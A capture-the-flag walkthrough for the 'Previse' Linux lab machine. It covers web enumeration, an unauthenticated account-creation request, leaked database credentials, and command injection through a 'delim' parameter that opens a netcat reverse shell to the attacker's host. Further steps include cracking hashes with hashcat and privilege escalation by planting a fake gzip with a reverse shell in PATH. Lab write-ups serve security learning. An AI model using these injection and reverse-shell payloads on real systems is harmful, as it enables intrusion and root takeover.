PREVISE (Linux) Walkthrough

ENUMERATION

MACHINE IP

export IP=10.10.11.104

NMAP SCAN RESULTS

PORT   STATE SERVICE REASON
22/tcp open  ssh     syn-ack ttl 63
80/tcp open  http    syn-ack ttl 63

Enumerating Web Contents

  • Using gobuster to find the directories
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt  -u http://10.10.11.104/ -t 100 -x php,txt,js,html,jpg  -q
  • Directories Found
/download.php         (Status: 200) [Size: 2224]
/login.php            (Status: 200) [Size: 2224]
/index.php            (Status: 200) [Size: 2224]
/files.php            (Status: 200) [Size: 2224]
/nav.php              (Status: 200) [Size: 1248]
/header.php           (Status: 200) [Size: 980] 
/footer.php           (Status: 200) [Size: 217] 
/css                  (Status: 200) [Size: 939] 
/status.php           (Status: 200) [Size: 2224]
/js                   (Status: 200) [Size: 1155]
/logout.php           (Status: 200) [Size: 2224]
/accounts.php         (Status: 200) [Size: 2224]
/config.php           (Status: 200) [Size: 0]   
/logs.php             (Status: 200) [Size: 2224]

  • A little more analysis from Burp or by active scan can found the contents of these pages which are being redirect to /login.php

  • Retrive the contents of /accounts.php

  • You should be able to make a request to create a account

  • REQUEST TO CREATE ACCOUNT (Can be Figure out using BURP)

POST /accounts.php HTTP/1.1
Host: 10.10.11.104
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 57
Origin: http://10.10.11.104
Connection: close
Referer: http://10.10.11.104/site.webmanifest/
Cookie: PHPSESSID=rk9dphd6i16kl9rvg6c98mc7lf
Upgrade-Insecure-Requests: 1
Sec-GPC: 1

username=admin&password=testpass&confirm=testpass&submit=

  • Now we can Login to this account and can further enumerate the web panel

  • We found Some source code Backup at

http://10.10.11.104/files.php

  • These source code backup was uploaded by User newguy

  • Downloading and Extract Gives a Lot of files to look for

  • Found Some Juicy content in config.php

<?php

function connectDB(){
    $host = 'localhost';
    $user = 'root';
    $passwd = 'mySQL_p@ssw0rd!:)';
    $db = 'previse';
    $mycon = new mysqli($host, $user, $passwd, $db);
    return $mycon;
}

?>

  • These may also be the user credentials

  • Let’s try SSh, with below details

  • NOT WORKED

GETTING REVERSE SHELL

  • Lets Read the Source Code files.

  • In file /logs.php we can see a line, which is being executed using python script

$output = exec("/usr/bin/python /opt/scripts/log_process.py {$_POST['delim']}");
  • So we can use a payload like
delim=hello;nc -e /bin/sh 10.10.14.2 4444
  • Original Request
POST /logs.php HTTP/1.1
Host: 10.10.11.104
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 47
Origin: http://10.10.11.104
Connection: close
Referer: http://10.10.11.104/site.webmanifest/
Cookie: PHPSESSID=rk9dphd6i16kl9rvg6c98mc7lf
Upgrade-Insecure-Requests: 1
Sec-GPC: 1

delim=hello1111%26nc+-e+/bin/sh+10.10.14.2+4444
  • This should get us reverse shell
nc -lvp 4444
  • Stablizing the Netcat Reverse Shell
python -c 'import pty; pty.spawn("/bin/bash")'
export TERM=xterm

PRESS CTRL + Z ( To Background the shell)

stty raw -echo

fg (to foreground the shell)

USER FLAG

  • We currently do not have access to the user m4lwhere files

  • We will have to find some way to read user.txt

  • Let’s find out what is inside the SQL DATABASE using above found credentials

    $user = 'root';
    $passwd = 'mySQL_p@ssw0rd!:)';
    $db = 'previse';
  • Use Below Command to see the DATA from sql database
USE premise

SHOW TABLES

SELECT  * FROM  accounts;
  • Data We Found is encrypted
m4lwhere:$1$🧂llol$DQpmdvnb7EeuO6UaqRItf.
admin:$1$🧂llol$FbsumqZUt.kJRCYaWurtw0
  • Cracking the Passwords using HASHCAT
hashcat -a 3 -m 500 encrypted-creds.txt /usr/share/wordlists/rockyou.txt
  • Password Found
m4lwhere:ilovecody112235!
  • SSH into the m4lwhere account
ssh [email protected]
  • We can find the User Flag Here /home/w4lwhere/user.txt

PRIVILEDGE ESCALATION

  • Lets Find the allowed files to run as root
sudo -l
  • We found below script is allowed to run as root
/opt/scripts/access_backup.sh
  • Contents of File

#!/bin/bash

# We always make sure to store logs, we take security SERIOUSLY here

# I know I shouldnt run this as root but I cant figure it out programmatically on my account
# This is configured to run with cron, added to sudo so I can run as needed - we'll fix it later when there's time

gzip -c /var/log/apache2/access.log > /var/backups/$(date --date="yesterday" +%Y%b%d)_access.gz
gzip -c /var/www/file_access.log > /var/backups/$(date --date="yesterday" +%Y%b%d)_file_access.gz

  • Here gzip is using PATH Variables to execute the gzip command

  • We can Add our own path and create a gzip file which will be executed in place of original gzip. (LINUX PRIVILEDGE ESCALATION USING PATH VARIABLE)

export PATH=/tmp:$PATH
echo $PATH
cd /tmp
echo "nc -e /bin/bash 10.10.14.2 4444" > gzip
chmod 777 gzip
sudo /opt/scripts/access_backup.sh
  • Along Side Create a netcat listener to receive the reverse shell
nc -lnvp 4444

  • We Should Have got the root shell.

  • Check /root/root.txt for ROOT Flag.

PREVISE HAS BEEN PWNED